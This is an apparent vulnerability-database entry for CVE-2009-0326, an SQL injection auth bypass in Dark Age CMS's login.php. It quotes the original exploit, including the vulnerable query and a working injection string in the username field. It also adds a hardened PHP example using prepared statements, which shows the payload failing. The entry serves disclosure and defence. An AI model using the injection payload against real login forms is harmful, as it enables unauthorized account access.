Dark Age CMS 'login.php' SQL Injection Vulnerability

Vulnerability ID: 1117227
Vulnerability type: SQL injection
Published: 2009-01-13
Updated: 2009-01-29
CVE ID: CVE-2009-0326
CNNVD-ID: CNNVD-200901-422
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7758
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-422
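|Vulnerability details
login.php in Dark Age CMS 0.2c Beta contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the username and password parameters.
|Exploit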
--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site  : http://darkjoker.net23.net
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]	
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]	

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-13]
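
A hardened form of the login check quoted in the advisory, as an added example (not code from the advisory or from Dark Age CMS). It assumes PDO with an in-memory SQLite database standing in for the real one; the `accounts` table name, the `login()` helper and the seeded credentials are constructed for illustration.

```php
<?php
// Constructed stand-in for the application's ACCOUNTS_TABLE constant.
define('ACCOUNTS_TABLE', 'accounts');

// Constructed in-memory database with one sample account.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ' . ACCOUNTS_TABLE . ' (username TEXT PRIMARY KEY, password TEXT)');
$seed = $pdo->prepare('INSERT INTO ' . ACCOUNTS_TABLE . ' (username, password) VALUES (?, ?)');
$seed->execute(['admin', md5('s3cret-constructed')]);

// Hypothetical helper: returns true only when both username and password match.
function login(PDO $pdo, string $username, string $userPassword): bool
{
    // The table name comes from a constant, never from the request.
    // The username is bound as a parameter, so quotes and comment
    // characters in it are data, not SQL syntax.
    $stmt = $pdo->prepare(
        'SELECT password FROM ' . ACCOUNTS_TABLE . ' WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $stored = $stmt->fetchColumn();
    if ($stored === false) {
        return false; // no such account
    }
    // The password is checked in PHP, so the check cannot be cut out of the
    // query. md5() is kept only to match the stored format shown in the
    // advisory; it is not a suitable password hash.
    return hash_equals($stored, md5($userPassword));
}

// Valid constructed credentials.
var_dump(login($pdo, 'admin', 's3cret-constructed'));
// The login data from the advisory, now treated as a literal username.
var_dump(login($pdo, "x' OR 'x' = 'x'#", 'anything'));
```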
|References

Source: XF
Name: darkagecms-login-sql-injection(48095)
Link: http://xforce.iss.net/xforce/xfdb/48095
Source: BID
Name: 33271
Link: http://www.securityfocus.com/bid/33271